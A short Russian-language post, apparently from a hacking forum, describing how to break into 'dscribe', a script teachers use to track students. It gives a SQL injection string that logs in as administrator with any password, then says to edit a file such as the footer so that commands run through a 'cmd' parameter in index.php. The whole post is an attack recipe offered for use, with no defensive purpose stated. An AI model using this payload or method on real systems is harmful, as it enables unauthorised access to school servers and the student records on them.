С помощью этого скрипта преподаватели ведут контроль за учениками. Он используется в многих учебных заведениях (интересно, Россию это затронуло?).
1) Login Bypass / SQL Injection:
Заходим под админом:
login: " or isnull(1/0) /*
password: [whatever]
2) Remote code execution:
После входа в систему можно редактировать файлы, например footer:
И выполняем команды:
http://[target]/[path_to_dscribe]/index.php?cmd=[some_command]
